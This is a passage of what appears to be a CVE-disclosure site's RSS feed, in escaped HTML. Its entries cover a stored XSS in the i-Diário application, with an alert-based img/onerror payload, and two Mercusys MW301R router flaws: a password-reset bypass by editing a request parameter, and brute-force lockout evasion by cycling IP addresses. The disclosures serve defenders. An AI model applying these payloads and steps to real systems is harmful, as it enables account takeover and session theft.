		data-flex-basis=&amp;#34;410px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7871.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7871.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7872</title>
        <link>https://www.cvehunters.com/p/cve-2025-7872/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7872/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7872-cross-site-scripting-xss-stored-endpoint-justificativas-de-falta-parameter-justificativa&amp;#34;&amp;gt;CVE-2025-7872: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7872&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7872&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7872-cross-site-scripting-xss-stored-endpoint-justificativas-de-falta-parameter-justificativa&amp;#34;&amp;gt;CVE-2025-7872: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7872&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7872&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Justificativa&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC3&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7872/image.png&amp;#34;
	width=&amp;#34;972&amp;#34;
	height=&amp;#34;892&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7872/image_hu_b4847f334cbf63a8.png 480w, /p/cve-2025-7872/image_hu_711c4335047c53ed.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;108&amp;#34;
		data-flex-basis=&amp;#34;261px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7872.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-7872.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7881</title>
        <link>https://www.cvehunters.com/p/cve-2025-7881/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7881/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7881-authentication-bypass-in-reset-password&amp;#34;&amp;gt;CVE-2025-7881: Authentication Bypass in reset password
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7881&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7881&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;In authenticated sessions, it is possible to completely bypass the password‑change workflow without knowing the current admin password. On the Mercusys MW301R, the official recovery method for a forgotten password is to perform a factory reset—which requires physical access—or, within a valid session, to supply the existing password. The discovered bypass allows an attacker who is already authenticated to intercept the HTTP request and simply modify the code parameter to invoke the reset endpoint directly. This enables the administrator password to be changed remotely, without any physical interaction with the device or knowledge of the previous credential.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7881-authentication-bypass-in-reset-password&amp;#34;&amp;gt;CVE-2025-7881: Authentication Bypass in reset password
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7881&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7881&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;In authenticated sessions, it is possible to completely bypass the password‑change workflow without knowing the current admin password. On the Mercusys MW301R, the official recovery method for a forgotten password is to perform a factory reset—which requires physical access—or, within a valid session, to supply the existing password. The discovered bypass allows an attacker who is already authenticated to intercept the HTTP request and simply modify the code parameter to invoke the reset endpoint directly. This enables the administrator password to be changed remotely, without any physical interaction with the device or knowledge of the previous credential.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ol&amp;gt;
  &amp;lt;li&amp;gt;
    Access the router&amp;#39;s web interface by navigating to &amp;lt;code&amp;gt;http://192.168.1.1/&amp;lt;/code&amp;gt; and logging in with the administrator password.
    &amp;lt;br /&amp;gt;&amp;lt;strong&amp;gt;Note:&amp;lt;/strong&amp;gt; If the password is forgotten, the only recovery method is a factory reset using the physical Reset button (hold it until all LEDs light up).
  &amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;
    While logged in, perform any action that triggers a POST request with &amp;lt;code&amp;gt;code=&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;id=&amp;lt;/code&amp;gt; parameters (e.g., keepalive or status check), and intercept it using a proxy to capture a valid session ID.
  &amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;
    Modify the intercepted request by changing &amp;lt;code&amp;gt;code=&amp;lt;/code&amp;gt; to &amp;lt;code&amp;gt;code=5&amp;lt;/code&amp;gt;, then forward the altered request to the router.
  &amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;
    Refresh the page at &amp;lt;code&amp;gt;http://192.168.1.1/&amp;lt;/code&amp;gt; in your browser.
  &amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;
    The interface will now prompt for a new password without asking for the current one. Set and confirm your new password to reset it remotely.
  &amp;lt;/li&amp;gt;
&amp;lt;/ol&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7881/image.png&amp;#34;
	width=&amp;#34;1761&amp;#34;
	height=&amp;#34;914&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7881/image_hu_84851d9b3281fdd2.png 480w, /p/cve-2025-7881/image_hu_712ec8092b9c202e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7881/image-1.png&amp;#34;
	width=&amp;#34;1896&amp;#34;
	height=&amp;#34;950&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7881/image-1_hu_ffbdf451785a2336.png 480w, /p/cve-2025-7881/image-1_hu_b3e5565b00c0449f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;199&amp;#34;
		data-flex-basis=&amp;#34;478px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7881/image-2.png&amp;#34;
	width=&amp;#34;1743&amp;#34;
	height=&amp;#34;990&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7881/image-2_hu_b00c8f44d15ccd57.png 480w, /p/cve-2025-7881/image-2_hu_9492fbe60421903a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;176&amp;#34;
		data-flex-basis=&amp;#34;422px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7881/image-3.png&amp;#34;
	width=&amp;#34;1897&amp;#34;
	height=&amp;#34;948&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7881/image-3_hu_582f72308fd6f70c.png 480w, /p/cve-2025-7881/image-3_hu_bf92a9c54baec3b4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;200&amp;#34;
		data-flex-basis=&amp;#34;480px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/-mlmTZ-3PzM&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/-mlmTZ-3PzM&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The lack of session validation in this endpoint can lead to several security risks:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Unauthorized Data Exposure:&amp;lt;/b&amp;gt; Unauthenticated users can enumerate or retrieve sensitive internal data.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Privilege Escalation:&amp;lt;/b&amp;gt; Attackers might access or infer information intended only for authorized users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Information Disclosure:&amp;lt;/b&amp;gt; Business logic and internal IDs (like user roles or permissions) can be leaked.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Reconnaissance Support:&amp;lt;/b&amp;gt; Facilitates attackers in mapping backend structures for more targeted attacks.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7881.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7881.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7882</title>
        <link>https://www.cvehunters.com/p/cve-2025-7882/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7882/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7882-brute-force-bypass-via-ip-cycling&amp;#34;&amp;gt;CVE-2025-7882: Brute Force Bypass via IP Cycling
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7882&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7882&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The Mercusys MW301R router implements a basic brute-force protection mechanism that blocks login attempts after a number of failed tries. However, this blocking mechanism is based solely on the source IP address, without enforcing any session fingerprinting, token validation, or advanced rate-limiting / and MAC Address, etc.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;/p&amp;gt;An attacker connected to the LAN can simply change their local IP address (e.g., from 192.168.1.10 to 192.168.1.11) after reaching the limit, effectively resetting the login attempt counter. &amp;lt;/br&amp;gt; This allows a brute-force attack to be performed against the admin login page, completely defeating the intended security mechanism.
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ol&amp;gt;
  &amp;lt;li&amp;gt;
    Connect to the same local network as the router (default gateway: &amp;lt;code&amp;gt;192.168.1.1&amp;lt;/code&amp;gt;) to prepare the attack environment.
  &amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;
    Start brute-force login attempts by sending requests with different password values. After a few failures, the router will block further attempts from that IP address.
  &amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;
    To bypass the block, change your device’s IP address to another one within the allowed range, then continue the brute-force process from the new IP.
  &amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;
    Repeat this process—each time your IP is blocked, switch to another IP between &amp;lt;code&amp;gt;192.168.1.4&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;192.168.1.254&amp;lt;/code&amp;gt; and resume the attack.
  &amp;lt;/li&amp;gt;
&amp;lt;/ol&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7882-brute-force-bypass-via-ip-cycling&amp;#34;&amp;gt;CVE-2025-7882: Brute Force Bypass via IP Cycling
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7882&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7882&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The Mercusys MW301R router implements a basic brute-force protection mechanism that blocks login attempts after a number of failed tries. However, this blocking mechanism is based solely on the source IP address, without enforcing any session fingerprinting, token validation, or advanced rate-limiting / and MAC Address, etc.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
